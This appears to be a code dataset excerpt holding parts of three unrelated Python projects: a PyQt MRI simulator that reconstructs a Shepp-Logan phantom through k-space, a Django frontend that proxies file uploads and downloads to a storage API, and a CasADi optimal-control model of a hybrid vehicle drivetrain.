shepp_logan((imageSize[imageSizeIndex], imageSize[imageSizeIndex], 20), MR=True)\n imageType = [phantomImg , T1[:,:,15] , T2[:,:,15] , PD[:,:,15]]\n # onclick adding a pixel rectangle around the pixel\n if clickedData[\"clicked\"] == True:\n # Create a Rectangle patch\n x = clickedData[\"X\"]\n y = clickedData[\"Y\"]\n rect = patches.Rectangle((x,y), 1, 1, linewidth=1, edgecolor='r', facecolor='none')\n # Add the patch to the Axes\n self.axes.add_patch(rect)\n # save the image to be easy to control contrast\n plt.imsave('images/tempPhantom.png', imageType[imageTypeIndex], cmap='gray')\n img = Image.open(\"images/tempPhantom.png\")\n img_contr_obj = ImageEnhance.Contrast(img)\n factor = contrastFactor\n e_img = img_contr_obj.enhance(factor)\n arrayImg = np.array(e_img)\n self.axes.imshow(arrayImg, cmap='gray')\n return (str(T1[int(clickedData[\"X\"]) , int(clickedData[\"Y\"]) , 15]) , \n str(T2[int(clickedData[\"X\"]) , int(clickedData[\"Y\"]) , 15]),\n str(PD[int(clickedData[\"X\"]) , int(clickedData[\"Y\"]) , 15]))\n \n#-------------------------------------< MAINWINDOW Code >-----------------------------------------------------\n\n# Create a class for your main window that inherits from Ui_MainWindow and QMainWindow\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n # -------------link ui file------------------------------#\n uic.loadUi(r'UI/MRI_Simulator.ui', self)\n \n #--------------Adding Phantom figure to layouts-----------#\n self.phantomLayout = self.horizontalLayout_4\n self.phantomCanvas = phantomMplCanvas(self.centralwidget, width=3, height=4, dpi=100)\n 
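# (added comments) the canvas is embedded like any other Qt widget; the two\n        # mpl_connect calls just below register Matplotlib mouse handlers:\n        # 'button_press_event' drives pixel inspection (a double click shows T1/T2/PD)\n        # and 'button_release_event' turns the vertical drag distance into a contrast factor.\n        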
self.phantomLayout.addWidget(self.phantomCanvas)# phantom Canvas\n self.phantomCanvas.mpl_connect('button_press_event', self.phantom_onClick)\n self.phantomCanvas.mpl_connect('button_release_event', self.phantom_contrast)\n \n #--------------Adding Sequence figure to layouts-----------#\n self.sequenceLayout = self.verticalLayout_3\n self.sequenceCanvas = MyMplCanvas(self.centralwidget, width=7, height=3, dpi=100)\n self.sequenceLayout.addWidget(self.sequenceCanvas)# sequence Canvas\n\n #--------------Adding Reconstucted image figure to layouts-----------#\n self.Reconstructedimage_graph_layout = self.verticalLayout_6\n self.Reconstructedimage_graph = MyMplCanvas(self.centralwidget, width=3, height=3, dpi=100)\n self.Reconstructedimage_graph_layout.addWidget(self.Reconstructedimage_graph)\n\n #--------------Adding K-sapce figure to layouts-----------#\n self.KspaceLayout = self.verticalLayout_5\n self.Kspace_graph = MyMplCanvas(self.centralwidget, width=3, height=3, dpi=100)\n self.KspaceLayout.addWidget(self.Kspace_graph)\n \n \n # ---------------------Global variables----------------------#\n #sequence variables\n self.Rf_line = 20\n self.Gz_line = 15\n self.Gy_line = 10\n self.Gx_line = 5\n self.Ro_line = 0\n self.JSON_List = []\n\n # contrast variables\n self.contrastFactor = float(1)\n self.minContrast = 0.1\n self.maxContrast = 10\n self.clicked_point = None\n\n # -----------------Connect buttons with functions--------------#\n self.phantomSize_comboBox.activated.connect(lambda:self.phantomImageDraw())\n self.imageTypeCombobox.activated.connect(lambda:self.phantomImageDraw())\n self.actionOpen.triggered.connect(lambda:self.read_file())\n self.Start_Buttun.clicked.connect(lambda: self.make_threading(self.reconstruct_image))\n self.Sequence_Combobox.activated.connect(self.Generate_Sequence)\n self.Value_Line_Edit.textChanged.connect(lambda: self.get_Value())\n self.Ts_Line_Edit.textChanged.connect(lambda: self.get_Ts())\n self.Te_Line_Edit.textChanged.connect(lambda: self.get_Te())\n self.Export_Button.clicked.connect(self.write_file)\n self.TR_Line_Edit.textChanged.connect(lambda: self.get_ReptitionTime())\n self.TEcho_Line_Edit.textChanged.connect(lambda: self.get_EchoTime())\n self.Send_Button.clicked.connect(self.DrawTR_TE)\n self.FA_Line_Edit.textChanged.connect(lambda: self.get_Flip_angle())\n # -----------------------functions defination-----------------------------------#\n def phantom_onClick(self , event: QMouseEvent ):\n print(event.button)\n if event.dblclick :\n T1 ,T2 , PD = self.phantomImageDraw(clicked={\"clicked\":True , \"X\":event.xdata , \"Y\":event.ydata})\n print('%s click: button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %\n ('double' if event.dblclick else 'single', event.button,\n event.x, event.y , event.xdata, event.ydata))\n self.T1value_label.setText(T1)\n self.T2value_label.setText(T2)\n self.PDvalue_label.setText(PD)\n\n if event.button == 1: # Left mouse button\n self.clicked_point = (event.xdata, event.ydata)\n\n def phantom_contrast(self , event ):\n if event.button == 1 and self.clicked_point is not None: # Left mouse button and a point has been clicked\n released_point = (event.xdata, event.ydata)\n dy = released_point[1] - self.clicked_point[1]\n print(f\"Released mouse button on point ({released_point[0]:.2f}, {released_point[1]:.2f}), dy = {dy:.2f}\")\n self.clicked_point = None\n if(dy < 0 ):\n print(\"UP\")\n self.contrastFactor -= dy/10\n elif(dy > 0 ):\n print(\"DOWN\")\n self.contrastFactor -= dy/10\n\n if self.contrastFactor <= self.minContrast:\n 
self.contrastFactor = self.minContrast\n elif self.contrastFactor >= self.maxContrast:\n self.contrastFactor = self.maxContrast\n print(\"factor is :\" , self.contrastFactor)\n self.phantomImageDraw()\n print(\"done\")\n \n def phantomImageDraw(self ,clicked = {\"clicked\":False , \"X\":0 , \"Y\":0}):\n #current indeces of the phantom size combobox and phantom image combobox\n self.imageSizeIndex = self.phantomSize_comboBox.currentIndex()\n self.imageTypeIndex = self.imageTypeCombobox.currentIndex()\n self.phantomLayout.removeWidget(self.phantomCanvas)# phantom Canvas\n self.phantomCanvas = phantomMplCanvas(self.centralwidget, width=3, height=4, dpi=100)\n T1 ,T2 , PD = self.phantomCanvas.compute_initial_figure(imageSizeIndex = self.imageSizeIndex ,imageTypeIndex = self.imageTypeIndex ,\n clickedData = clicked, contrastFactor=self.contrastFactor)\n self.phantomLayout.addWidget(self.phantomCanvas)# phantom Canvas\n self.phantomCanvas.mpl_connect('button_press_event', self.phantom_onClick)\n self.phantomCanvas.mpl_connect('button_release_event', self.phantom_contrast)\n return(T1 ,T2 , PD)\n\n def read_file(self):# BROWSE TO READ THE FILE\n self.File_Path = QFileDialog.getOpenFileName(self, \"Open File\", \"This PC\",\n \"All Files (*);;JSON Files(*.json)\")\n\n with open(self.File_Path[0], 'r') as handle:\n json_data = [json.loads(line) for line in handle]\n self.df = pd.DataFrame(json_data)\n\n #calling the function that used in plotting mri sequence\n self.Draw_Sequence(self.df)\n\n def get_Value(self):\n if self.Value_Line_Edit.text() != \"\":\n self.value = self.Value_Line_Edit.text()\n return float(self.value)\n\n def get_Ts(self):\n if self.Ts_Line_Edit.text() != \"\":\n self.Ts = self.Ts_Line_Edit.text()\n return float(self.Ts)\n\n def get_Te(self):\n if self.Te_Line_Edit.text() != \"\":\n self.Te = self.Te_Line_Edit.text()\n return float(self.Te)\n\n def Clear_Line_Edits(self):\n self.Value_Line_Edit.clear()\n self.Ts_Line_Edit.clear()\n self.Te_Line_Edit.clear()\n\n def Generate_Sequence(self):\n val = self.get_Value()\n Ts = self.get_Ts()\n Te = self.get_Te()\n if self.Sequence_Combobox.currentIndex()==0:\n self.Draw_RF(val, Ts, Te)\n elif self.Sequence_Combobox.currentIndex()==1:\n self.Draw_Gradients(val, Ts, Te, self.Gz_line)\n elif self.Sequence_Combobox.currentIndex()==2:\n self.Draw_Gradients(val, Ts, Te, self.Gy_line)\n elif self.Sequence_Combobox.currentIndex()==3:\n self.Draw_Gradients(val, Ts, Te, self.Gx_line)\n else:\n self.Draw_Ro(val, Ts, Te)\n self.Clear_Line_Edits()\n\n def Draw_RF(self, val, Ts, Te):\n if (val == 90):\n Rf_amplitude = 3\n elif (val > 90):\n Rf_amplitude = 5\n elif (val < 90):\n Rf_amplitude = 1\n self.plot_Const_Lines()\n x1 = np.linspace(Ts, Te, 1000)\n y1 = self.Rf_line + (Rf_amplitude * np.sinc(x1 - 10))\n self.sequenceCanvas.axes.plot(x1, y1, color='maroon', marker='o')\n self.sequenceCanvas.draw()\n data_1 = {\"Value\": val, \"Ts\": Ts, \"Te\": Te},\n self.JSON_List.append(data_1)\n\n def Draw_Ro(self, val, Ts, Te):\n if (val == 90):\n Ro_amplitude = 3\n elif (val > 90):\n Ro_amplitude = 5\n elif (val < 90):\n Ro_amplitude = 1\n x1 = np.linspace(Ts, Te, 1000)\n y1 = self.Ro_line + (Ro_amplitude * np.sinc(x1 - 55))\n self.sequenceCanvas.axes.plot(x1, y1, color='maroon', marker='o')\n self.sequenceCanvas.draw()\n data_1 = {'Value': val, 'Ts': Ts, 'Te': Te},\n self.JSON_List.append(data_1)\n\n def Draw_Gradients(self, val, Ts, Te, line):\n if (val == 90):\n Gradient_amplitude = 1\n elif (val > 90):\n Gradient_amplitude = 1.06\n elif (val < 
90):\n Gradient_amplitude = 0.98\n self.sequenceCanvas.axes.step(x=[Ts, Te, Te], y=[line, (line + 1) * Gradient_amplitude, line])\n self.sequenceCanvas.draw()\n data_1 = {'Value': val, 'Ts': Ts, 'Te': Te},\n self.JSON_List.append(data_1)\n\n def write_file(self):\n with open('Data_Json.json', 'w') as f:\n json.dump(self.JSON_List, f)\n\n def plot_Const_Lines(self):\n self.sequenceCanvas.axes.cla()\n [self.sequenceCanvas.axes.axhline(y=i, color='r', linestyle='-') for i in\n [self.Ro_line, self.Gx_line, self.Gy_line, self.Gz_line, self.Rf_line]]\n self.sequenceCanvas.axes.set_xlabel('t (msec)')\n self.sequenceCanvas.axes.set_yticklabels([0, 'Ro', 'Gx', 'Gy', 'Gz', 'Rf'])\n self.sequenceCanvas.draw()\n\n def get_ReptitionTime(self):\n if self.TR_Line_Edit.text() != \"\":\n self.TR = self.TR_Line_Edit.text()\n return float(self.TR)\n\n def get_EchoTime(self):\n if self.TEcho_Line_Edit.text() != \"\":\n self.TEcho = self.TEcho_Line_Edit.text()\n return float(self.TEcho)\n\n def DrawTR_TE(self):\n for line in self.sequenceCanvas.axes.lines:\n if line.get_color() == 'green':\n line.remove()\n for label in self.sequenceCanvas.axes.texts:\n if label.get_color() == 'green':\n label.remove()\n TR = self.get_ReptitionTime()\n TE = self.get_EchoTime()\n for p,l in zip([TR, TE], ['TR', 'TE']):\n self.sequenceCanvas.axes.axvline(p, color='green', ls='--')\n self.sequenceCanvas.axes.text(p, 23, l, color='green')\n self.sequenceCanvas.draw()\n \n\n\n def Draw_Sequence(self, df):\n self.plot_Const_Lines()\n # plotting functions of Rf,Gz,Gy,Gx,Ro\n x_rf = np.linspace(df[\"RF1_Ts\"].values[0], df[\"RF1_Te\"].values[0], 1000)\n y_rf = self.Rf_line + ((df[\"RF1_value\"].values[0]) * np.sinc(x_rf - 10))\n\n x_ro = np.linspace(df[\"Ro_Ts\"].values[4], df[\"Ro_Te\"].values[4], 1000)\n y_ro = self.Ro_line + ((df[\"Ro_value\"].values[4]) * np.sinc(x_ro - 55))\n\n x_rf2 = np.linspace(df[\"RF2_Ts\"].values[5], df[\"RF2_Te\"].values[5], 1000)\n y_rf2 = self.Rf_line + ((df[\"RF2_value\"].values[5]) * np.sinc(x_rf2 - 80))\n\n self.sequenceCanvas.axes.plot(x_rf, y_rf, color='maroon', marker='o')\n self.sequenceCanvas.axes.step(x=[df[\"Gz_Ts\"].values[1], df[\"Gz_Te\"].values[1], df[\"Gz_Te\"].values[1]],\n y=[self.Gz_line, (self.Gz_line + 1) * df[\"Gz_value\"].values[1], self.Gz_line])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[self.Gy_line, (self.Gy_line + 1) * df[\"Gy_value\"].values[2], self.Gy_line])\n self.sequenceCanvas.axes.step(x=[df[\"Gx_Ts\"].values[3], df[\"Gx_Te\"].values[3], df[\"Gx_Te\"].values[3]],\n y=[self.Gx_line, (self.Gx_line + 1) * df[\"Gx_value\"].values[3], self.Gx_line])\n self.sequenceCanvas.axes.plot(x_ro, y_ro, color='maroon', marker='o')\n self.sequenceCanvas.axes.plot(x_rf2, y_rf2, color='maroon', marker='o')\n\n\n # Plotting repeat of Gy if it exists\n if (df[\"Gy_repeated\"].values[2] == \"True\"):\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 1), (self.Gy_line + 2) * df[\"Gy_value\"].values[2], (self.Gy_line + 1)])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 2), (self.Gy_line + 3) * df[\"Gy_value\"].values[2], (self.Gy_line + 2)])\n\n # Plotting reverse of Gy if it exists\n if (df[\"Gy_reversed\"].values[2] == \"True\"):\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n 
y=[self.Gy_line, ((self.Gy_line + 1) * df[\"Gy_value\"].values[2] * -1) + (self.Gy_line + 1) + 9, self.Gy_line])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 1), ((self.Gy_line + 2) * df[\"Gy_value\"].values[2] * -1) + (self.Gy_line + 1) + 9,\n (self.Gy_line + 1)])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 2), ((self.Gy_line + 3) * df[\"Gy_value\"].values[2] * -1) + (self.Gy_line + 1) + 9,\n (self.Gy_line + 2)])\n\n\n self.sequenceCanvas.axes.axvline(x=df[\"RF1_Te\"].values[0]/2, ls='--')\n\n self.sequenceCanvas.axes.set_xlabel('t (msec)')\n self.sequenceCanvas.axes.set_yticklabels([0,'Ro', 'Gx', 'Gy', 'Gz', 'Rf'])\n self.sequenceCanvas.draw()\n\n\n # Reconstrucing the image\n\n #getting the value of the flip angle\n def get_Flip_angle(self):\n if self.FA_Line_Edit.text() != \"\":\n self.FA = self.FA_Line_Edit.text()\n else:\n self.FA = 90\n return float(self.FA)\n\n # normalizing the image to put the minimum and maximum pixel values between 0 and 255\n def normalize_image(self,image):\n # Find the minimum and maximum pixel values\n min_val = np.min(image)\n max_val = np.max(image)\n\n # Normalize the image using the formula (image - min) / (max - min)\n normalized_image = (image - min_val) / (max_val - min_val)\n\n return normalized_image\n\n # moddifying the image to reconstruct it\n def modify_image(self, Phantom_img):\n normalized_img = self.normalize_image(Phantom_img)\n final_image = np.zeros((Phantom_img.shape[0], Phantom_img.shape[1], 3))\n final_image[:, :, 2] = normalized_img\n return final_image\n\n # matrix of rotation z\n def equ_of_Rotation_z(self, theta):\n rotation_z = np.array(\n [[np.cos(np.radians(theta)), -np.sin(np.radians(theta)), 0],\n [np.sin(np.radians(theta)), np.cos(np.radians(theta)), 0], [0, 0, 1]])\n return rotation_z\n\n # matrix of rotation x\n def equ_of_Rotation_x(self, theta):\n rotation_x = np.array([[1, 0, 0], [0, np.cos(np.radians(theta)), -np.sin(np.radians(theta))],\n [0, np.sin(np.radians(theta)), np.cos(np.radians(theta))]])\n return rotation_x\n\n # applying rotation x to the modified image with the flip angle we want\n def Rotation_x(self, Image, phase_X):\n rotated_image = np.zeros(Image.shape)\n for i in range(0, Image.shape[0]):\n for j in range(0, Image.shape[1]):\n rotated_image[i, j] = np.dot(self.equ_of_Rotation_x(phase_X), Image[i, j])\n\n return rotated_image\n\n # Reconstrucing the image and generating kspace\n # you will find the number of the step in the function\n # step 1 : select the phantom size and modify image and get the flip angle\n # step 2 : start looping over rows and columns of the phantom image and calling the function of rotation x that means we hit rf signal with our flip angle\n # step 3 : we made the phase to make the rotation z (gradient x and y) with it and apply gradient on rows and columns of the image\n # step 4 : we get gradient image, make sumation of values x and y and make the complex value (kspace)\n # step 5 : we plot kspace and image after reconstruction\n def reconstruct_image(self):\n # step 1\n self.Kspace_graph.axes.clear()\n self.Reconstructedimage_graph.axes.clear()\n # choosing size of phantom\n if self.phantomSize_comboBox.currentIndex()==0:\n phantomImg = shepp_logan(16)\n elif self.phantomSize_comboBox.currentIndex()==1:\n phantomImg = shepp_logan(32)\n elif self.phantomSize_comboBox.currentIndex()==2:\n phantomImg = 
shepp_logan(64)\n        else:\n            phantomImg = shepp_logan(16)\n\n        kSpace = np.zeros((phantomImg.shape[0], phantomImg.shape[1]), dtype=np.complex128)  # np.complex_ was removed from NumPy\n        modified_img = self.modify_image(phantomImg)\n        Phase_of_X = self.get_Flip_angle()\n        # step 2\n        for R in range(0, modified_img.shape[0]):\n            rotated_matrix = self.Rotation_x(modified_img, Phase_of_X)\n            for C in range(0, modified_img.shape[1]):\n                # step 3\n                step_of_Y = (360 / modified_img.shape[0]) * C\n                step_of_X = (360 / modified_img.shape[1]) * R\n                Final_matrix = np.zeros(modified_img.shape)\n                #Applying rotation z in x&y plane\n                for i in range(0, modified_img.shape[0]):\n                    for j in range(0, modified_img.shape[1]):\n                        phase = step_of_Y * j + step_of_X * i\n                        Final_matrix[i, j] = np.dot(self.equ_of_Rotation_z(phase), rotated_matrix[i, j])\n                # step 4\n                #Getting the value of kspace\n                gradient_image = Final_matrix\n                sum_of_x = np.sum(gradient_image[:, :, 0])\n                sum_of_y = np.sum(gradient_image[:, :, 1])\n                complex_value = complex(sum_of_x, sum_of_y)  # np.complex was removed from NumPy; the builtin is equivalent\n                kSpace[R, C] = complex_value\n\n        Final_img = np.zeros((phantomImg.shape[0], phantomImg.shape[1], 3))\n        Final_img[:, :, 2] = phantomImg\n        # step 5\n        Kspace_shifted = np.fft.fftshift(kSpace)\n        self.Kspace_graph.axes.imshow(np.abs(Kspace_shifted), cmap='gray')\n        self.Kspace_graph.draw()\n        self.Kspace_graph.start_event_loop(0.0005)\n        Reconstructed_image = np.fft.fft2(kSpace)\n        self.Reconstructedimage_graph.axes.imshow(np.abs(Reconstructed_image), cmap='gray')\n        self.Reconstructedimage_graph.draw()\n        self.Reconstructedimage_graph.start_event_loop(0.0005)\n        print(R)\n\n    def make_threading(self, any_function):\n        # create a thread\n        thread = Thread(target=any_function)\n        # run the thread\n        thread.start()\n\nif __name__ == '__main__':\n    # Instantiate the main window class and show it\n    app = QApplication([])\n    window = MainWindow()\n    window.show()\n    # Run the application\n    app.exec_()","repo_name":"Abanoob-Meseha/MRI_Simulator","sub_path":"main_task.py","file_name":"main_task.py","file_ext":"py","file_size_in_byte":22394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43428322238","text":"import json\n\nimport requests\nfrom django.shortcuts import redirect, render\nfrom my_storage_gui.settings import API_EXTERNAL_IP_REDIRECT, API_INTERNAL_IP\n\n\ndef download(request, path):\n    try:\n        raw = (('?' + request.GET.get('download') + '=yes') if (\n            request.GET.get('download')) else '')\n        if raw:\n            return redirect(\n                f'http://{API_EXTERNAL_IP_REDIRECT}/upload{raw}&path={path}')\n        dir_tree = requests.get(f'{API_INTERNAL_IP}/dir').json()\n        api_response = requests.get(\n            f'{API_INTERNAL_IP}/upload', data={'path': path}).json()\n    except requests.RequestException as error:\n        api_response = {\n            'data': type(error).__name__,\n            'error_message': str(error)\n        }\n        dir_tree = {'error': 'Unavailable'}\n    content = api_response.get('data') or api_response.get('error')\n\n    return render(\n        request,\n        template_name='api_response.html',\n        context={\n            'response': json.dumps(api_response, indent=4),\n            'dir_tree': json.dumps(dir_tree, indent=4),\n            'content': content if len(content) <= 30 else (\n                'Large file. 
Please download it instead.'),\n 'path': path\n }\n )\n\n\ndef upload(request, path):\n file = request.FILES.get('file')\n text = request.POST.get('text', 'empty file content')\n api_response = {'error': text}\n try:\n if file:\n api_response = requests.post(\n f'{API_INTERNAL_IP}/upload',\n files={'file': file},\n data={'path': path}).json()\n else:\n api_response = requests.post(\n f'{API_INTERNAL_IP}/upload',\n data={'path': path, 'text': text}).json()\n dir_tree = requests.get(f'{API_INTERNAL_IP}/dir').json()\n except requests.RequestException as error:\n dir_tree = {'error': 'Unavailable'}\n api_response = {\n 'exception_type': type(error).__name__,\n 'error_message': str(error)\n }\n return render(\n request,\n template_name='api_response.html',\n context={\n 'response': json.dumps(api_response, indent=4),\n 'dir_tree': json.dumps(dir_tree, indent=4),\n 'content': file if file else text\n }\n )\n\n\ndef index(request):\n return render(request, template_name='index.html')\n","repo_name":"rshafikov/my_storage","sub_path":"frontend/files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4336639589","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\nCreated on Mon Jun 12 16:10:42 2017\n\n@author: Massimo De Mauri\n'''\n\nimport csv\nimport casadi as cs\nimport numpy as np\nimport MIRT_OC as oc\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as ptc\nimport matplotlib as mpl\nfrom matplotlib import cm\nfrom scipy.interpolate import interp1d\nfrom os import path, chdir\nfrom time import time\n\n# local components lib\nfrom models import insight_50kw_power_jc as engine\nfrom models import advisor_em_pwr_sc as electric_motor\nfrom models import battery_hu as battery\n\n\ncurrent_directory = path.abspath(path.dirname(__file__))\nchdir(current_directory)\n\n# ------------------------------------------------\n# Cycle\n# ----------------------------------------------\n\n# import the driving cycle\nwith open(current_directory+'/cycle.csv', 'r') as csvfile:\n cycle_dat = list(csv.reader(csvfile,delimiter = ','))[0]\n cycle_dat = [float(s) for s in cycle_dat]\n cycle_dat = cycle_dat[10:]\n\n\n# resolution of the time discretization\ndt = 1\n# start time\nstart = 7\n# length of the considered time window\nwl = len(cycle_dat)-start-1 # int(min(200,len(cycle_dat)-start-1))\n\ncycle_base = cs.DM(cycle_dat[start:wl+start+1])\nt_base = np.linspace(0,wl,wl+1)\nf = interp1d(np.squeeze(t_base),np.squeeze(cycle_base),axis=0)\n\nn_Steps = wl/dt\ntime_vec = t_base[0] + cs.DM([t for t in range(int(n_Steps+1))])*(t_base[-1]-t_base[0])/n_Steps\ncycle_dat = cs.DM(f(time_vec))\ndcycle_dat = cs.vertcat((cycle_dat[1:]-cycle_dat[:-1])/(time_vec[1:]-time_vec[:-1]),0)\n\n\n# ------------------------------------------------\n# Model\n# ------------------------------------------------\n\n# temporary variables\nw = cs.MX.sym('w')\nP = cs.MX.sym('P')\nPrat = cs.MX.sym('Prat')\nErat = cs.MX.sym('Erat')\nSoC = cs.MX.sym('Erat')\n\n# ICE\nICE_wrat = 6000*np.pi/30\nICE_data = engine()\nICE_dFin = cs.Function('ICE_dFin', [Prat,w,P], [ICE_data['dFin'](ICE_wrat,1000*Prat,w,1000*P)])\nICE_Fstart = cs.Function('ICE_Fstart', [Prat], [ICE_data['Fstart'](1000*Prat)])\nICE_Pmax = cs.Function('ICE_Pmax', [Prat,w], [ICE_data['Pmax'](ICE_wrat,1000*Prat,w)*1e-3])\nICE_mass = cs.Function('ICE_mass', [Prat], [ICE_data['mass'](1000*Prat)])\nICE_minw = 
max(ICE_data['minw'](ICE_wrat),1000*np.pi/30)\n\n# EM\nEM_wrat = 10000*np.pi/30\nEM_data = electric_motor()\nEM_Pin = cs.Function('EM_Pin', [Prat,w,P], [EM_data['Pin'](EM_wrat,1000*Prat,w,1000*P)*1e-3])\nEM_Pmax = cs.Function('EM_Pmax',[Prat,w], [EM_data['Pmax'](EM_wrat,1000*Prat,w)*1e-3])\nEM_mass = cs.Function('EM_mass',[Prat], [EM_data['mass'](1000*Prat)])\n\n# battery\nBT_data = battery()\nSoC_max = BT_data['SoC_max']\nSoC_min = BT_data['SoC_min']\nBT_dSoC = cs.Function('BT_dSoC',[Erat,SoC,P], [BT_data['dSoC'](Erat*3.6e6,SoC,1000*P)])\nBT_Pout = cs.Function('BT_Pout',[Erat,SoC,P], [BT_data['Pout'](Erat*3.6e6,SoC,1000*P)*1e-3])\nBT_Pmax = cs.Function('BT_Pmax',[Erat,SoC], [BT_data['Pmax'](Erat*3.6e6,SoC)*1e-3])\nBT_Pmin = cs.Function('BT_Pmin',[Erat,SoC], [BT_data['Pmin'](Erat*3.6e6,SoC)*1e-3])\nBT_mass = cs.Function('BT_mass',[Erat], [BT_data['mass'](Erat*3.6e6)])\n\n\n# model parameters\nbase_mass = 800\nfrictionCoeff = 0.005\nwheelR = 0.285\ndrag_area = 2\nair_density = 1.225\ndrag_coeff = .35\nreferece_speeds = [15,30,55,85,115]\nreference_RPM = 2500\nR = [(reference_RPM*np.pi/30)/((referece_speeds[k]/3.6)/wheelR) for k in range(len(referece_speeds))]\nRem = (3000*np.pi/30)/((60/3.6)/wheelR)\nICE_Prat = 55\nEM_Prat = 25\nBT_Erat = 1.024 #kWh\nTNK_Frat = 30000\nTNK_Finit = TNK_Frat/2\nSoC_opt = SoC_min + 0.75*(SoC_max - SoC_min)\nSoC_start = SoC_min + 0.1*(SoC_max - SoC_min)\n\n\n# ------------------------------------------------\n# Problem definition\n# ------------------------------------------------\n\n# create optimal control model\nmodel = oc.OCmodel('Parallel Hybrid Drivetrain')\n\n# external inputs\nmodel.i = [oc.input('cycle',cycle_dat), oc.input('dcycle',dcycle_dat)]\ncycle = model.i[0].sym\ndcycle = model.i[1].sym\nSoCcoeff = oc.input('SoCcoeff',oc.DM.zeros(time_vec.numel()))\nmodel.i.append(SoCcoeff)\n\n# differential states\nSoC = oc.variable('SoC',SoC_min,SoC_max,SoC_start)\nFuel = oc.variable('F',0,TNK_Frat,TNK_Finit)\nmodel.x = [SoC,Fuel]\n\n# instantaneous transition states\nOFFstate = oc.variable('OFFstate',0,1,1)\nGEARstate = oc.variable('GEARstate',0,5,0)\nmodel.y = [OFFstate,GEARstate]\n\n# algebraic variables\nmodel.a = []\n\n# continuous controls\ndFuel = oc.variable('dF',0,20.0,0)\nPb = oc.variable('Pb',BT_Pmin(BT_Erat,1.0),BT_Pmax(BT_Erat,1.0),0)\nPice = oc.variable('Pice',0,ICE_Prat,0)\nPem = oc.variable('Pem',-EM_Prat,EM_Prat,0)\nswitch = oc.variable('switch',0,oc.inf,0)\nmodel.u = [dFuel,Pice,Pb,Pem,switch]\n\n#discrete controls\nOFF = oc.variable('OFF',0,1,1)\nG = [oc.variable('G'+str(k+1),0,1,int(k==0)) for k in range(len(R))]\nmodel.v = [OFF] + G\n\n# ode\nmodel.ode = [BT_dSoC(BT_Erat,SoC.sym,Pb.sym),-dFuel.sym]\n\n# instantaneous transitions\ngear = sum([(k+1)*G[k].sym for k in range(len(R))])\nmodel.itr = [OFF.sym-OFFstate.sym, gear-GEARstate.sym]\n\n# precalculations\nmass = base_mass + ICE_mass(ICE_Prat) + EM_mass(EM_Prat) + BT_mass(BT_Erat)\nFreq = mass*dcycle+.5*air_density*drag_coeff*drag_area*cycle**2\nTreq = Freq*wheelR\nPaux = 0.3 # accessory power load kW\nPreq = Freq*cycle/1000\n\n\nwem = Rem*cycle/wheelR\nwice = sum([G[k].sym*R[k]*cycle/wheelR for k in range(len(R))])\nGEAR_ = sum([(k+1)*G[k].sym for k in range(len(R))])\n\n# path constraints\nmodel.pcns = [oc.geq(Pem.sym+Pice.sym,Preq)]+\\\n \\\n [oc.eq(sum([G[k].sym for k in range(len(R))]) + OFF.sym,1)]+\\\n [oc.leq(OFF.sym-OFFstate.sym, switch.sym)]+\\\n [oc.geq(OFF.sym-OFFstate.sym,-switch.sym)]+\\\n [oc.leq(GEAR_-GEARstate.sym, 5*switch.sym)]+\\\n 
[oc.geq(GEARstate.sym-GEAR_,-5*switch.sym)]+\\\n \\\n [oc.leq(wice,ICE_wrat*0.5)]+\\\n [oc.leq(ICE_minw*(1-OFF.sym),wice)]+\\\n [oc.leq(Pice.sym,ICE_Prat*(1-OFF.sym))]+\\\n [oc.leq(Pice.sym,ICE_Pmax(ICE_Prat,wice)[k]) for k in range(ICE_Pmax(0,0).numel())]+\\\n [oc.leq(ICE_dFin(ICE_Prat,wice,Pice.sym)[k]-OFF.sym*ICE_dFin(ICE_Prat,0,0)[k],dFuel.sym) for k in range(ICE_dFin(0,0,0).numel())]+\\\n \\\n [oc.leq(Pb.sym,BT_Pmax(BT_Erat,SoC.sym))]+\\\n [oc.geq(Pb.sym,BT_Pmin(BT_Erat,SoC.sym))]+\\\n [oc.leq(EM_Pin(EM_Prat,wem,Pem.sym)[k] + Paux,BT_Pout(BT_Erat,SoC.sym,Pb.sym)) for k in range(EM_Pin(0,0,0).numel())]+\\\n \\\n [oc.leq(Pem.sym, EM_Prat)]+\\\n [oc.geq(Pem.sym,-EM_Prat)]\n\n# sos1 constraints\n# model.sos1 = [oc.sos1_constraint([v.nme for v in G]+['OFF'],cs.vertcat(*[r.sym for r in R]+[0]))]\n\n# objective\nmodel.lag = (0.4*45.6*dFuel.sym+Pb.sym)\nmodel.ipn = 0.4*45.6*ICE_Fstart(ICE_Prat)*switch.sym\nmodel.may = 200*(-cs.log((SoC.sym-SoC_min)/(SoC_max-SoC_min)) - cs.log((SoC_max-SoC.sym)/(SoC_max-SoC_min)) + 2*cs.log(.5))\n\n# model.may = (200*BT_Erat*SoCcoeff.sym*(1-SoC.sym))**2 # 200g/kWh is the maximum theoretical efficiency for engines\nmodel.epigraph_reformulation(max_orders = [1,1,2],integration_opts={'schema':'rk4','n_steps':1})\n\nprint(model)\nprint('\\n---------------------------------------------------------------------------------')\n\n\n# ------------------------------------------------\n# MPC procedure\n# ------------------------------------------------\n\n# 